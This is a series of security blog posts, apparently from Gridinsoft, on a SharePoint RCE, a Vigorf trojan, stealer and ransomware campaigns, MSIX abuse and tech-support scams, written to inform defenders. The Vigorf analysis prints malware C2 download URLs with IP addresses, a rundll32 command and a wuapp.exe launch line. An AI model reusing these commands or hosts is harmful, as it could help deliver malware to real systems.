Remote code execution vulnerability

A vulnerability designated with the identifier CVE-2023-24955 (CVSS: 7,2) has been discovered in the popular Microsoft SharePoint product. It includes SharePoint Enterprise Server 2013, SharePoint Server 2016 and SharePoint Server 2019. The vulnerability allows attackers to exploit the code injection vulnerability. This involves replacing a specific file (/BusinessDataMetadataCatalog/BDCMetadata.bdcm) on the server, which leads to the injected code being compiled into an assembly that SharePoint then executes. This action effectively grants the attacker the ability to execute arbitrary code on the server.

The vulnerability was originally identified by a group of security researchers who then reported their findings to Microsoft. The specifics of the vulnerability is that it exploits a flaw in the mechanism for handling specially crafted web requests. This means that for a successful attack, an attacker only needs to send a specially crafted request to a SharePoint server. Moreover, it does not require the attacker to have credentials or prior access to the victim’s network.

Remote code execution flaws are traditionally considered the most severe ones. They effectively allow attackers to execute the code they need in several systems across the environment. Such flaws can serve as both entry points and the instrument for lateral movement. And considering the popularity of Microsoft solutions, it is expected for this vulnerability to be used along with other ones within the Microsoft ecosystem.

Official Microsoft Patches and Updates

Interestingly enough, the vulnerability was fixed before it was uncovered by the researchers. The fix appeared within the course of Patch Tuesday in May 2023. Despite that, after the public disclosure, the company published security advisories and provided updates for all supported versions of the product, urging users to immediately apply patches to protect their systems. Official patches are available through Microsoft’s standard update channels and on the official support site. Though, this should have been done way earlier, considering the high CVSS score of the flaw.

At the same time, other vulnerabilities are rarely patched before the public disclosure. Protecting against them requires strong security solutions, particularly ones that can detect potential exploitation. EDR/XDR and the programs of this grade will not only protect against vulnerability exploitation, but also give you the ability to orchestrate the response to minimize the damage.

The post Microsoft SharePoint Vulnerability Exploited, Update Now appeared first on Gridinsoft Blog.

What is Usermode Font Driver Host?

The Usermode Font Driver Host process, as its name suggests, is responsible for handling fonts in user mode, which helps the system display text in various applications and interfaces. The running process is usually located in the standard system directory C:\Windows\System32\fontdrvhost.exe. This process also handles requests from applications and programs that require font rendering services. Among the latter is everything from basic text display to complex font formatting in documents and web pages.

In recent Windows updates, when you try to find the fontdrvhost.exe process in Task Manager, you will see that it is running under the user name “UMFD-0”. This is an account for the User Mode Driver Framework, which restricts the process’s access to only working with fonts. This provides the security that recent Windows updates have brought. The UMFD-0 account ensures that the process does not extend to activities other than font manipulation.

Usermode Font Driver Host High CPU and Memory Troubleshooting

High consumption of CPU and memory resources by the Usermode Font Driver Host process may occur in several cases. First one is you are working with graphic editors, designing programs or loading a large number of non-standard fonts.

Alternatively, increased consumption also can be caused by incorrect operation or failure in the Windows font management system. When corrupted or incorrectly created fonts are installed in the system, Usermode Font Driver Host may consume an excessive amount of resources trying to process or fix them.

Problems with Usermode Font Driver Host may be related to a corrupted UMFD-0 image. There are a couple of ways to solve this problem – through running a system files’ scan, or by updating Windows. Let’s start with the least invasive one.

Troubleshooting Step 1: Run System File Checker

Windows carries quite a few system recovery utilities that will be helpful with pretty much any situation. In the case of file corruption, a tool called System File Checker will be on hand.

• Open a command prompt as administrator:
  Type cmd in the search box and click “Run as administrator” to open elevated Command Prompt.

• Type the next command “sfc/scannow” and press Enter.

• Wait for the scanning process to complete and errors to be corrected.
• Restart your computer after the scan is complete.

If System File Checker does not solve the problem, it may indicate deeper system irregularities. In such a case, it is recommended to update Windows to replace and update system files, which may fix existing system problems.

Troubleshooting Step 2: Update Windows

Windows Update is an effective solution to the problem of high resource consumption caused by incompatibility or a faulty system module. Each Windows updates contain bug fixes and performance improvements that can solve existing resource consumption problems. Developers constantly analyze user reports and diagnostic data to optimize system performance. To check for updates, press the Windows key + I and choose “Windows Update.” If any updates are available, download and install them.

Troubleshooting Step 3: Removing damaged fonts

As I wrote above, the fontdrvhost.exe may consume an excessive amount of resources to process more corrupted fonts. Therefore, remove fonts that have been installed recently or may be corrupted.

To do this, go to Control Panel > Fonts.

Then, remove fonts that fall under the following description:

• The font is not compatible with your encoding language
• Downloaded from unreliable sources
• Font is repeated several times
• Not used for a long time

Can I Stop or Disable Usermode Font Driver Host?

The Usermode Font Driver Host is an essential part of Windows and I do not recommend deleting or disabling it. Removing it can result in errors while running various Windows applications, especially those that depend on the fontdrvhost.exe process. Among them are Microsoft Word, Excel, PowerPoint, email clients, messaging apps, and many more. I will additionally emphasize that Usermode Font Driver Host is not malware and cannot be used by one.

The post Usermode Font Driver Host (fontdrvhost.exe) appeared first on Gridinsoft Blog.

What is Trojan:Win32/Vigorf.A?

Trojan:Win32/Vigorf.A is the detection name that Microsoft Defender attributes to dropper/loader malware. This generic detection name refers to a whole range of malicious programs, rather than one specific family. The goal of Vigorf.A is unauthorizing system access, and further malware distribution. As my detailed analysis has shown, Trojan:Win32/Vigorf.A uses various methods to bypass antivirus programs and operating system protection.

Usually, this malware downloads or installs other malicious programs on the computer. It drops its files and modifies system settings and other configuration files to gain persistence. Additionally, it connects to remote servers to send collected information and download additional malicious programs.

Is Trojan:Win32/Vigorf.A False Positive?

False positives with the Vigorf.A name is not a common occurrence. There are only a few cases discussed online, and all of them are related to the software that borders on malicious.

The most common case here is game modifiers or patches. Such tools modify game memory or files to unlock features and can be misidentified as Trojan:Win32/Vigorf.A because of their ability to intrude into other programs’ memory. Similar tools and scripts used by software developers can be misidentified as malicious. While being potentially safe and legitimate, it is important to treat such software with care.

Vigorf.A Trojan Analysis

Studying the behavior of Trojan:Win32/Vigorf.A sample on an infected system showed me how elaborate these threats can be. Not only does the Trojan collect personal user data, but it also modifies system settings, creating additional vulnerabilities and opening the door for other malware.

Methods of Distribution

Trojan:Win32/Vigorf.A is often spread via spam e-mail campaigns containing malicious attachments or links. Once the user opens the attachment or clicks on the link, the Trojan is installed on their computer, either directly or through the loading script. Despite being used for malware spreading for years now, email spam remains a particularly potent and effective spreading option.

Malvertising is another tricky method that has been used to spread Trojan:Win32/Vigorf.A as far as my research goes. This malware exploits ad networks to display malicious ads in search engine results. Such ads redirect users to malicious duplicates of familiar sites or directly download malware onto their devices.

In addition, Vigorf.A is often hidden in packages containing illegal or pirated software. When I download and install such programs, the trojan is also installed on my computer. Often such software is offering for free, which makes it attractive, but it ends up costing more because of the damage the trojan causes.

Launch, Gaining Persistence and Data Collection

After launching in the system, Trojan:Win32/Vigorf.A adds itself to autorun by taking advantage of the Startup folder. This allows it to start automatically every time the system starts. In my case, I found a strange shortcut adxjcv4.lnk, which turned out to be associated with the trojan.

APPDATA%\microsoft\windows\start menu\programs\startup\_adxjcv4_.lnk

Alternatively, Vigorf.A may use the DLL hijacking technique. This happens particularly often when malware arrives with the loader, which unpacks the sample and handles the launch. The way to run the malware is nothing unusual – a PowerShell command that runs the malware DLL through the call to rundll32.exe.

rundll32.exe %windir%\system32\advpack.dll

After the launch, malware checks the system location by its IP address and switches to collecting the system data. This gives Vigorf.A the ability to distinguish that particular system from others. This can as well be used for more targeted attacks or to get a rather exhausting set of victims’ system info to analyze. Malware particularly checks the values of the following keys to get info about programs present on the PC:

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA} and \=\Count

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F} and \=\Count

By checking the next keys, Trojan:Win32/Vigorf.A learns about the devices and networks to which the computer connects and can identify the most vulnerable points for further attacks. This information helps malware masters to deploy malware in a more relevant manner, and get extra profit from systems related to a network.

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Nla\Cache and \=\Intranet

HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect

C2 Communications and Malware Delivery

After collecting all this data, Vigorf encrypts and sends it to the command server using HTTP POST request. The list of command servers was predefined for the samples I’ve worked with, but this may differ in other cases. Server, in turn, responds with a blob of data that instructs malware for further actions. Obviously for dropper malware, payload delivery is one of the most probable instructions it can get.

To instruct the dropper for malware delivery, C2 sends the URLs Vigorf should connect and download it from. It sends HTTP GET commands to the following URLs:

http[:]//185.117.75.198/fiscal/1
http[:]//194.163.43.166/08/st/m.zip

Files downloaded from these addresses were disguised as ordinary documents or incomplete files, making them difficult to detect and analyze. Once Vigorf finishes downloading the malware, it uses system utilities such as wuapp.exe to launch it.

"C:\Windows\System32\wuapp.exe" -c "C:\ProgramData\sHrhJDaCBu\cfg"

How to Remove Trojan:Win32/Vigorf.A?

To remove Trojan:Win32/Vigorf.A, I recommend using GridinSoft Anti-Malware. It will detect and remove Vigorf.A, as well as find other malicious programs downloaded by it. This Anti-Malware can also work with Windows Defender to create an additional line of defense.

It is important to run a Full Scan and remove all detected threats. I would also recommend keeping the system and all programs updated to the latest versions to eliminate vulnerabilities that malware can exploit.

The post Trojan:Win32/Vigorf.A appeared first on Gridinsoft Blog.

Microsoft Hacked, Source Code Leaked

In its K-8 filing to SEC, Microsoft claims the relation of the latest hack to the one that was uncovered in January 2024. A Russian threat actor known as Nobelium/Midnight Blizzard managed to hack into Microsoft systems. The hack happened around November, with hackers staying inside for until January. This eventually resulted in adversaries gaining access to the emails of executives and certain authentication tools. And it turns out that attackers managed to take away some of the authentication secrets even after being discovered.

In the latest attack, Midnight Blizzard used these leaked auth secrets to get into the Microsoft internal networks once again. The same K-8 filing discloses the facts of hackers getting access (or at least attempting to) using the said leaked keys. Among particular systems under attack are source code repositories and some of the internal systems. Microsoft warns that the unauthorized access may happen repeatedly in future, meaning that they do not know the exact scale of auth secrets leak.

One fortunate thing though is that customer-facing assets and their data was not compromised. And this is most likely true, as the previous attacks mainly concentrated on top-tier executives, who barely have access to customer data. And this is a big relief: the scale of consequent attacks due to the data leaked from Azure, Outlook or other cloud services could have been tremendous. Still, no excuses for such a large company to fall victim to hackers.

Who is Midnight Blizzard?

Nobelium/APT29/Fancy Bear or Midnight Blizzard, by the new Microsoft classification, is a Russian state-sponsored threat actor. It mainly aims at cyber espionage, being led by the Russian External Intelligence Agency (SVR). The group is known for picking loud targets for its attacks, particularly government agencies, military contractors and the like.

Microsoft became their point of interest back in 2022, when they managed to hack an auxiliary SSO system for Windows Server. 2023 though has become a year of a “proper” hack. Back in November 2023, APT29 managed to stay in the network for quite some time, compromising a lot of different internal systems. Considering the uncertainity regarding the amount of compromised elements, they will certainly repeat.

The post Microsoft is Hacked, Again by Midnight Blizzard appeared first on Gridinsoft Blog.

Phemedrone Stealer Campaign Exploits CVE-2023-36025

Trend Micro researchers uncovered a malware campaign exploiting the CVE-2023-36025 vulnerability in Microsoft Windows Defender SmartScreen. This campaign involves the Phemedrone Stealer, which can extract a wide range of sensitive data. Its infection chain begins with cloud-hosted malicious URL files, often disguised using URL shorteners. Upon execution, these files exploit CVE-2023-36025 to initiate the malware download.

The campaign itself is concentrated on social media. Hackers spread URL files, that look as an innocent link shortcut. Clicking it initiates a call to the GitHub repo, that returns the shellcode needed to download and run the payload. While it is not new to see the frauds targeting such places, the use of URL files is what defines the efficiency of the trick. They essentially act as a lockpick to user trust, spam filters and system protection all at once.

CVE-2023-36025: A Gateway for Cybercriminals

In a nutshell, CVE-2023-36025 is a critical vulnerability that affects Microsoft Windows Defender SmartScreen. It allows attackers to bypass security warnings and checks by manipulating Internet Shortcut (.url) files. Despite Microsoft’s patch released on November 14, 2023, cybercriminals have actively exploited the vulnerability, leading to its inclusion in the Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities (KEV) list.

In the Phemedrone campaign, frauds use advanced evasion tactics by utilizing a control panel item (.cpl) file to bypass Windows Defender SmartScreen. By default, it should send you a warning once you the URL shortcut. But the usage of specifically crafted file variant circumvents the protection and executes malicious downloads in the background. Further on the line, a couple of other known Windows weaknesses are exploited, particularly the Windows Control Panel binary.

Detailed Analysis

Attackers spread Phemedrone Stealer malware using cloud hosting and URL shorteners. They exploit CVE-2023-36025 by tricking users into opening .url files. They evade Windows Defender SmartScreen using a .cpl file and the MITRE ATT&CK technique T1218.002. The malware executes a DLL loader that calls Windows PowerShell to download a loader from GitHub. The second-stage loader, Donut, can execute various types of files in memory and targets multiple applications and services to steal sensitive information.

The malware collects system information and compresses it into a ZIP file using MemoryStream and ZipStorage classes. It then validates the Telegram API token and sends the attacker the compressed data via the SendMessage and SendZip methods. The SendZip method uses an HTTP POST request to compress the data into a document and send it to the Telegram API.

Mitigation and Recommendations

In light of this threat, when attackers find vulnerabilities faster than developers fix them, we have a few recommendations in that regard:

• Regularly update your OS, apps, and security solution. This action is crucial as developers continuously address security vulnerabilities through patches. Although the process may seem tedious, it is a necessary and proactive measure to ensure that your operating system, applications, and security solutions are equipped with the latest defenses against evolving cyber threats.
• Be cautious with Internet Shortcut (.url) files. Exercise caution, especially when dealing with Internet Shortcut files, particularly those received from unverified sources. These files can serve as gateways for malware, making it essential to pay attention to the legitimacy of URLs before opening them to mitigate the risk of infection.
• Implement advanced security solutions. This measure detects and neutralizes malware if it infiltrates your device. Robust security software with real-time monitoring and threat detection capabilities adds an extra layer of protection, helping identify and promptly respond to potential threats.



• Stay informed about the risks of phishing and social engineering. These tactics often serve as the initial vectors for malware campaigns. Educate yourself and your team on recognizing phishing attempts, avoiding suspicious links, and verifying the authenticity of communications to minimize the likelihood of falling victim to such cyber threats.

The post Windows SmartScreen Vulnerability Exploited to Spread Phemedrone Stealer appeared first on Gridinsoft Blog.

MSIX Installer Protocol Exploited

The emergence of a malware kit market, exploiting the MSIX file format and ms-app installer protocol is nothing new. However, in this case, the kit, sold as a service, enables attackers to leverage the vulnerabilities within the protocol to distribute malware, including ransomware.

As a reminder, MSIX is a file packaging format designed specifically for Windows 10. It was based on the concept of XML manifest files. In these files, developers can describe how the deployment process works, what files are needed, and where they can be obtained. The root of the problem is that files packaged with MSIX can be delivered to the system over the Internet via ms-appinstaller. That, in turn, makes it possible to create links format ms-appinstaller:?source=//website.com/file.appx, invoking malware installation in such a way.

As for modus operandi, crooks have effectively utilized signed malicious MSIX application packages camouflaged as legitimate software to infiltrate systems. These packages are spread through various channels. In this case, it’s Microsoft Teams and deceptive advertisements on popular search engines. This strategy allows the attackers to bypass traditional security measures, such as Microsoft Defender SmartScreen and browser download warnings, making the attacks more difficult to detect and prevent.

Multiple hacking groups have been found to exploit the App Installer service since mid-November 2023. These groups use various techniques to distribute malicious software, including fake installers and landing pages. Some notable groups include Storm-0569, Storm-1113, Sangria Tempest, and Storm-1674.

Microsoft Blocks MSIX Installer

That is not the first time Microsoft faces the exploitation of this installation method. In February 2022, Microsoft disabled the vulnerable protocol, due to its exploitation by Emotet, TrickBot, and BazaLoader malware. Back in the days, the used vulnerability was a bit different, but lead to almost the same effect – the drive-by malware installation.

This time, Microsoft recommends installing the patched App Installer version 1.21.3421.0 or later to block possible abuse. The patch disables the ms-appinstaller handle by default, thus making it impossible to misuse it. Redmond also advises administrators who cannot immediately install the latest version of App Installer to disable the protocol via Group Policy. They can do that by setting EnableMSAppInstallerProtocol to Disabled.

Is This Vulnerability Dangerous?

It is rather dangerous, and it becomes clear once you see the list of threat actors that exploit this issue. Most of the time, it allows for backdoor and RAT installation, which act as open gates for more malicious programs. Even though in current attacks MSIX vulnerability is used mostly against corporations, nothing stops cybercriminals from applying it against home users.

To stay protected against such attacks, it is vital to install the latest patches and keep an eye on cybersecurity news. As you can see, any critical vulnerability almost always hits the newsletter headlines.

As a layer of reactive protection, I can recommend having an advanced security solution. While being hard to detect in a signature analysis due to the spoofed certificate, malware is rather easy to uncover on the run with a heuristic detection system. GridinSoft Anti-Malware is a solution that can provide you this kind of protection.

The post Microsoft Disables MSIX App Installer Protocol appeared first on Gridinsoft Blog.

Cactus Ransomware Deployed by DanaBot

Microsoft’s Threat Intelligence team has disclosed an escalating wave of Cactus ransomware attacks. It is orchestrated by the notorious ransomware operator Storm-0216, a.k.a Twisted Spider/UNC2198. The malware campaign employs malvertising techniques, leveraging DanaBot as an entry point for the ransomware onslaught.

What makes Cactus particularly concerning is its ability to bypass antivirus software and exploit known vulnerabilities in VPN appliances to gain initial access to a network. Also, security experts have discovered that Cactus ransomware attacks exploit vulnerabilities in Qlik Sense, a data analytics platform. It is crucial to regularly update and patch software to protect against evolving ransomware threats.

What is DanaBot Malware?

DanaBot, identified by Microsoft as Storm-1044, stands as a multifaceted threat comparable to infamous counterparts like Emotet, TrickBot, QakBot, and IcedID. This malware operates as both a data stealer and a conduit for subsequent payloads. UNC2198, a threat group associated with DanaBot, has a track record of infecting endpoints with IcedID, a precursor to deploying ransomware families like Maze and Egregor, as previously outlined by Mandiant, a subsidiary of Google.

Microsoft’s intelligence suggests a transition from QakBot to DanaBot, likely triggered by a concerted law enforcement operation in August 2023 that dismantled QakBot’s infrastructure. The ongoing DanaBot campaign, observed since November, notably employs a private version of the info-stealing malware, diverging from the conventional malware-as-a-service approach.

Protective Measures

Microsoft’s recommendations include regular software updates and patches, robust security implementations, and comprehensive employee training to fortify defenses against phishing attempts.

1. Regularly back up your data offline to protect it. If ransomware attacks your computer, the backup files will not be affected, and you can restore them without paying a ransom.
2. It is important to conduct regular cybersecurity awareness training for employees to educate them about ransomware threats and safe online practices.
3. Employ network monitoring tools to identify suspicious activities and potential indicators of compromise, allowing for proactive threat detection.

The post Cactus Ransomware Attacks – Microsoft Alerts appeared first on Gridinsoft Blog.

What is Windows Defender Security Warning?

Fake Windows Defender Security Warning (Microsoft Security Warning) is a malicious attempt to deceive users into believing their system is compromised or at risk. In reality, these warnings are part of a scam. Cybercriminals create deceptive pop-up notifications or messages that mimic the appearance and language of genuine Windows Defender alerts. These counterfeit warnings often use scare tactics.

Usually, such sites claim the presence of malware, viruses, or security breaches on the user’s system. They aim to trick users into taking immediate, unwarranted actions. It can be clicking on malicious links, downloading fraudulent software, or providing sensitive information like login credentials or credit card details.

What makes these fake warnings even more convincing is the abuse of Microsoft Azure services. In short, Microsoft Azure is a reputable cloud computing platform that provides tools and services for legitimate purposes, including hosting websites and applications. However, cybercriminals exploit Azure’s flexibility to host their malicious landing pages and phishing sites, thereby lending an air of legitimacy to their schemes.

By leveraging Azure, scammers can secure SSL certificates and create deceptive subdomains, making their fake security warnings appear more convincing. They use Azure to build seemingly genuine login forms and landing pages, often targeting users with Microsoft, Office 365, Outlook, or OneDrive accounts.

How Does This Scam Work?

There are two most common scenarios for this kind of scam, and we’re going to look at them now.

Fake Login Page

In the first common scenario, attackers launch spam email campaigns that appear to originate from a reputable organization. For example, these scammers do their best to trap victims by mimicking the official login pages for Microsoft, Office 365, Outlook, and OneDrive. More often than not, these pages are indistinguishable from the real thing. For example, they may have a Microsoft logo, the correct color schemes, and even a nearly identical URL. Many users may genuinely believe they are on a legitimate Microsoft page.

To make their attacks even more convincing, attackers use Transport Layer Security (TLS) certificates. These certificates encrypt data between a user and a website and often serve as an indicator of trust. In this case, the certificates issued by Microsoft Azure TLS Issuing CA 05 for the *.1.azurestaticapps.net domain make the fake pages indistinguishable from the real ones. Attackers go even further to make their phishing pages attractive to attack users of other platforms such as Rackspace, AOL, Yahoo, and other email services. In this case, the spoofing becomes particularly camouflaged thanks to legitimate Microsoft security certificates.

When users are trying to determine if a phishing attack is targeting them, they are usually advised to carefully check the URL in the browser bar when prompted to enter credentials. However, in the case of phishing campaigns abusing Azure Static Web Apps, this advice is meaningless, as the azurestaticapps.net subdomain and the presence of a valid TLS security certificate will fool many users.

Tech Support Scam

Fake Microsoft Technical Support Scam – involves a scheme in which attackers impersonate Microsoft representatives or certified technicians. Usually, this scheme starts with a phishing site that contains a fake Microsoft Security Warning. This leads to the victim calling the scammers, hoping to get help solving the “problem”. They may use a variety of techniques to gain the attention and trust of potential victims. But, sometimes, scammers call random users and claim that the user’s computer has serious problems, viruses, or security breaches and offer to help resolve them.

To “help” users, scammers may ask permission to control the computer remotely. If the user agrees, attackers gain full access to the system and can install malware or steal personal data. In addition, scammers often ask the user to provide personal information such as credit card numbers, passwords, addresses, and other sensitive information.

How To Avoid These Scams?

To avoid falling victim to phishing scams like the ones abusing Azure Static Web Apps, it’s essential to follow the next practices for online security and remain vigilant. Here are some steps you can take to protect yourself:

• Check URLs before entering data. You should check the URL in the address bar when you’re asked to enter your account credentials on a login page. Look for any unusual subdomains or misspellings that could indicate a phishing site. Ensure that the domain is the official one for the service you’re using.
• Be careful with suspicious emails. Please don’t click on links or download attachments from unsolicited or unexpected emails. Always verify the legitimacy of an email, even if it appears to come from a trusted source.
• Verify the Source. When you receive an email requesting sensitive information or actions, contact the supposed sender directly through official channels to verify the request’s authenticity.
• Use a Password Manager. Thus, you can create strong, unique passwords for your online accounts. This prevents a single compromised password from affecting multiple accounts.
• Enable Two-Factor Authentication. Whenever possible, enable 2FA for your online accounts. This adds another layer of security and requires a second form of verification, such as a temporary code sent to your phone.
• Educate Yourself. It is crucial to keep yourself updated on the latest phishing techniques and common scam tactics to stay informed and protected. Be vigilant and cautious while browsing the internet or dealing with suspicious emails or messages. The more you know, the better you can protect yourself.
• Use Security Software. We recommend installing reputable anti-malware solutions on your devices. It can help detect and block malicious websites and emails.
• Keep Software Updated. Keep your operating system, web browsers, and security software up-to-date. This ensures that any known vulnerabilities are fixed.

By following these precautions and maintaining a healthy level of skepticism, you can significantly reduce the risk of falling victim to phishing scams. Cybercriminals continuously adapt their tactics, so staying vigilant is essential to your online security.

The post What is Microsoft Security Warning Scam? appeared first on Gridinsoft Blog.

What is Octo Tempest Cybercrime Gang?

Octo Tempest’s journey into the world of cybercrime is an intriguing one. Only a few months ago, it became the first English-speaking affiliate of the BlackCat ransomware gang. This collaboration marks a rare occurrence in the cybercriminal ecosystem, as historically, Eastern European ransomware groups have been reluctant to do business with native English-speaking criminals.

Octo Tempest’s modus operandi is characterized by well-organized and prolific attacks, reflecting a depth of technical expertise and the involvement of multiple operators with hands-on-keyboard skills. The group first appeared on the radar in early 2022, initially targeting mobile telecommunications and business process outsourcing organizations for SIM swaps. Notably, their activities were traced to ransomware attacks against Las Vegas casinos in September of the same year.

However, their ambitions did not stop there. In 2022, Octo Tempest orchestrated a large-scale campaign that compromised over 130 organizations, including prominent names like Twilio and Mailchimp, highlighting the group’s capacity to wreak havoc on a grand scale.

Collaboration with BlackCat and Ransomware Deployment

A significant turning point in Octo Tempest’s cybercriminal career was its collaboration with BlackCat, also known as ALPHV. The group began deploying ransomware payloads developed by BlackCat, extending their focus to both Windows and Linux systems. More recently, Octo Tempest has directed its efforts towards VMWare ESXi servers.

Octo Tempest remains financially motivated, with diverse monetization techniques. Their activities span from cryptocurrency theft to data exfiltration for extortion and ransomware deployment.

Octo Tempest Methods of Initial Access

Octo Tempest employs a range of methods for gaining initial access, including:

• Installing remote monitoring and management utilities.
• Navigating to fake login portals using an adversary-in-the-middle toolkit.
• Purchasing stolen employee credentials or session tokens on the dark web.
• Conducting SMS phishing campaigns targeting employee phone numbers with links to fake login portals.
• Leveraging SIM swaps or call forwarding on an employee’s phone number.
• Initiating a self-service password reset once control of the employee’s phone number is established.
• Fear-Mongering Tactics and Reconnaissance.

In rare instances, Octo Tempest resorts to fear-mongering tactics, targeting specific individuals through phone calls, texts, and even physical threats to coerce victims into sharing their credentials for corporate access.

Upon gaining initial access, the group proceeds with a meticulous reconnaissance process. It includes enumerating hosts and services, collecting information, and identifying documents related to network architecture, employee onboarding, remote access methods, password policies, and credential vaults. Their access to internal networks allows them to carry out broad searches across knowledge repositories to gather intelligence about the target’s infrastructure.

Defending Against Octo Tempest

Detecting and defending against Octo Tempest is no easy task due to their use of social engineering, living-off-the-land techniques, and a diverse toolkit. However, cybersecurity experts offer guidelines to help organizations detect and combat this rising cyber threat.

• Monitoring and reviewing identity-related processes, Azure environments, and endpoints are crucial steps in bolstering defenses against Octo Tempest.
• Educate yourself and your employees about social engineering and phishing tactics commonly used by Octo Tempest. Regular training on recognizing suspicious emails and links can help prevent successful attacks.
• Keep your operating systems, software, and applications up to date with the latest security patches. Cybercriminals often exploit known vulnerabilities in outdated software.
• Use a firewall to monitor and filter incoming and outgoing network traffic. Intrusion detection and prevention systems (IDPS) can also help detect suspicious activities.
• Regularly back up your data, both on-site and off-site. In the event of a ransomware attack, having clean, uninfected backups can save your data.
• Stay informed about emerging threats and vulnerabilities by monitoring cybersecurity news and threat intelligence feeds. This can help you adapt your defenses to evolving threats.

The post Octo Tempest Threat Actor – The Most Dangerous Cybercrime Gang? appeared first on Gridinsoft Blog.

Fake Amazon and Microsoft call centers busted

Indian authorities, in collaboration with Amazon and Microsoft, conducted Operation Chakra-II to crackdown on 76 illegal call centers across at least 11 states in India. These call centers posed as tech support for Amazon and Microsoft customers and defrauded over 2,000 individuals. This marks the first time two major companies have collaborated to combat online and tech support fraud. The Central Bureau of Investigation of India (CBI) led the Chakra-II operation.

On the other hand, Amazon said this:

Country-level scam

Perhaps almost every user has seen the “Hello Your Computer Has Virus” meme or jokes about Indian men calling people and introducing themselves as Microsoft tech support. So, India is a fertile ground for a thriving network of scammers. The Hindu tech support scam can be considered a worthy competitor to the Nigerian Prince scam. Primarily, scammers run illegal operations from call centers masquerading as legitimate businesses.

According to the FBI, tech support call centers fraud victims lost more than $1 billion in the US last year, with scammers mainly targeting older people. Nearly half of the victims were over 60, and they accounted for 69%, or more than $724 million, of the losses. Many of these scams target customers of Amazon and Microsoft, two of the largest companies in the tech industry. Unsurprisingly, these companies have banded together for the first time to fight against these scams.

How did this scam work?

The Central Bureau of Investigation (CBI) recently revealed that fraudsters have been pretending to be Amazon and Microsoft customer service agents. They have been contacting victims through online pop-up messages that appear to be real security alerts from these companies. The pop-up message claims that the user’s computer is experiencing technical issues and provides a toll-free number to contact customer support. However, the phone number actually belongs to the fraudsters’ electronic call centers. By the way, we have an article dedicated to breaking down this scam scheme.

Once the victim calls scammers, they, with some trickery, remotely access the victim’s computer and show them fake problems. They then charge the victim hundreds of dollars for fake solutions that were not needed in the first place. This fraudulent activity has allegedly been going on for the past five years. The fraudsters use various international payment gateways and channels to move the illegally obtained funds.

CBI exposes fake call centers

As part of five separate cases, a nationwide crackdown was conducted in Delhi, Punjab, Haryana, Himachal Pradesh, Uttar Pradesh, Madhya Pradesh, Karnataka, Kerala, Tamil Nadu, and West Bengal, which resulted in the confiscation of 32 mobile phones, 48 laptops/hard disks, 33 SIM cards, and pen drives. The operation also seized numerous bank accounts alongside 15 email accounts that were associated with the scammer network.

While the CBI did not disclose the number of arrests made during the operation, it was revealed that the illegal call centers had targeted more than 2,000 Amazon and Microsoft customers. The victims primarily reside in the US, Australia, Canada, Germany, Spain, and the UK. Amazon also confirmed that it had removed over 20,000 phishing websites and 10,000 phone numbers from impersonation schemes in 2022. The company reported hundreds of attackers worldwide to authorities.

Is it the end of Amazon/Microsoft Tech Support scams?

Not really. Frauds like that are exceptionally profitable, so there will always be a temptation to restart it. Sure, current con actors are detained, but nature abhors a vacuum. Where one group of crooks is no more – another will pop up rather quickly.

Though, the impunity myth these guys were bearing on is now busted. Further scams will be either more concealed, distributed, and/or reliant on less traceable technologies. Will they be more effective with all these upgrades? This is what we are about to discover.

The post Fake Amazon and Microsoft Tech Support call centers busted appeared first on Gridinsoft Blog.